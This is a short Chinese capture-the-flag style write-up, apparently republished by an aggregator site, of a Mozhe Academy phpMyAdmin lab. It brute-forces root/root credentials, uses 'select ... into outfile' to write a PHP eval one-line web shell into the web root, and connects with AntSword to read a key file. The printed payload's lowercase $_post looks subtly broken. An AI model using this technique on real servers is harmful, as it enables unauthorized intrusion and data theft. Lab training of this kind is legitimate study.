墨者学院——phpMyAdmin后台文件包含分析溯源

本文主要是介绍墨者学院——phpMyAdmin后台文件包含分析溯源，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

此题利用一句话***

进入登陆界面，用burpsuite爆破得到username与password都为：root

进入SQL界面，输入一句话***（密码为leo），点击“执行”：

select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php"

（/var/www/html/ 是网站的根目录)

此时打开蚁剑（注意：url后面记得跟上一句话***目标的页面3.php)：

在根目录找到key.txt：

这篇关于墨者学院——phpMyAdmin后台文件包含分析溯源的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！